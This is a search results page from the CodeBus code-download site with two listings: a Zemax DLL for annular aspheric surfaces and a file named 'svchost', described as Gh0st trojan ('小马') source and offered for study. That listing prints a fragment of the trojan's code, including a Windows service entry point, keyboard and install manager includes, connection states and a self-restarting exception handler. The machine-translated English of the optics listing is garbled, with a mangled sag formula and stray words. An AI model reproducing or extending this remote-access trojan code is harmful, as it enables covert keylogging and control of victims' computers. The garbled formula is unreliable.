CodeBus
www.codebus.net
Search
Sign in
Sign up
Hot Search :
Source
embeded
web
remote control
p2p
game
More...
Location :
Home
Search - 2 opt
Main Category
SourceCode
Documents
Books
WEB Code
Develop Tools
Other resource
Search - 2 opt - List
[
source in ebook
]
us_anasp
DL : 0
光学设计软件zemax源码: This DLL models an nular aspheric surface as described in: "Annular surfaces in annular field systems" By Jose M. Sasian Opt. eng. 36 (12) P 3401-3401 December 1997 This surface is essentially an odd aspheric surface with an offset in the aspheric terms. The sag is given by: Z = (c*r*r) / (1+(1-((1+k)*c*c*r*r))^ 1/2 ) + a*(r-q)^2 + b*(r-q)^3 + c*(r-q)^4 + ... Note the terms a, b, c, ... have units of length to the -1, -2, -3, ... power.-optical design software zemax source : This DLL models an annular aspheric surface as d escribed in : "Annular surfaces in annular field systems" By Jose M. Sasian Opt. eng. 36 (12) P 3401-3401 Dece This inflicted 1,997 surface is essentially an odd asp heric surface with an offset in the aspheric ter ms. The sag is given by : Z = (c* r* r)/(1 (1-((a k)* c* c* r* r)) ^ 1/2) a* (r- q) b ^ 2* (r-q)* c ^ 3 (r-q) ^ 4 ... Note the terms a, b, c, ... have units of length to the-1,-2,-3, ... power.
Date
: 2025-12-26
Size
: 41kb
User
:
狄拉克
[
source in ebook
]
svchost
DL : 0
ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #include common/login.h #include common/install.h #include common/until.h #include <stdio.h> enum { NOT_CONNECT, // 还没有连接 GETLOGINFO_ERROR, CONNECT_ERROR, HEARTBEATTIMEOUT_ERROR } extern C __declspec(dllexport) void ServiceMain(int argc, wchar_t* argv[]) //void __stdcall AntiYun() //void __stdcall MoniteGame() int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress ) void __stdcall ServiceHandler(DWORD dwControl) #ifdef _CONSOLE int main(int argc, char**argv) #else DWORD WINAPI main(char*lpServiceName) #endif SERVICE_STATUS_HANDLE hServiceStatus DWORD g_dwCurrState DWORD g_dwServiceType char svcname[MAX_PATH] LONG WINAPI bad_exception(struct _EXCEPTION_POINTERS* ExceptionInfo) { // 发生异常,重新创建进程 HANDLE
Date
: 2025-12-26
Size
: 4kb
User
:
段誉
CodeBus
is one of the largest source code repositories on the Internet!
Contact us :
1999-2046
CodeBus
All Rights Reserved.